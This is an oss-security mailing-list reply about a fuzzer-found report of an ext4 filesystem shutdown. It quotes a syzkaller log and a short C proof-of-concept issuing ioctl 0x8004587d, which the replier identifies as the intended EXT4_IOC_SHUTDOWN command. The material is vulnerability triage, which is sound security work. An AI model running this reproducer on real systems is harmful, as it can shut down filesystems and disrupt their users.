Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <20180828094537.GA10578@localvm.private.f2light.com>+6A304428CF1ACB2B
Date: Tue, 28 Aug 2018 17:45:37 +0800
From: Xiami <pengyu.tao@...li.com>
To: oss-security@...ts.openwall.com
Subject: Re: Linux kernel: FS_IOC_FSSETXATTR will lead to
 EXT4-fs shut down

On Tue, Aug 28, 2018 at 08:27:50AM +0000, zhrzhang(张洪睿) wrote:
> Hello：
>         when I fuzz，I found the kernel will always no output from machine, and error FS_IOC_FSSETXATTR contribute to this.
> 
>         the syzlog is as below:
> 
> r0 = creat(&(0x7f0000000140)='./file0\x00', 0x0)
> ioctl$FS_IOC_FSSETXATTR(r0, 0x8004587d, &(0x7f0000000080)={0x0, 0x0, 0x0, 0x8})

Your ioctl command 0x8004587d is exactly EXT4_IOC_SHUTDOWN defined in fs/ext4/ext4.h

> 
>         the poc will show like this:
> 
> #define _GNU_SOURCE
> 
> #include <endian.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <unistd.h>
> 
> uint64_t r[1] = {0xffffffffffffffff};
> 
> int main(void)
> {
> syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
> long res = 0;
> memcpy((void*)0x20000140, "./file0", 8);
> res = syscall(__NR_creat, 0x20000140, 0);
> if (res != -1)
> r[0] = res;
> *(uint32_t*)0x20000080 = 0;
> *(uint32_t*)0x20000084 = 0;
> *(uint32_t*)0x20000088 = 0;
> *(uint32_t*)0x2000008c = 8;
> *(uint32_t*)0x20000090 = 0;
> *(uint64_t*)0x20000098 = 0;
> syscall(__NR_ioctl, r[0], 0x8004587d, 0x20000080);
> return 0;
> }
> ________________________________
> zhrzhang(张洪睿)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.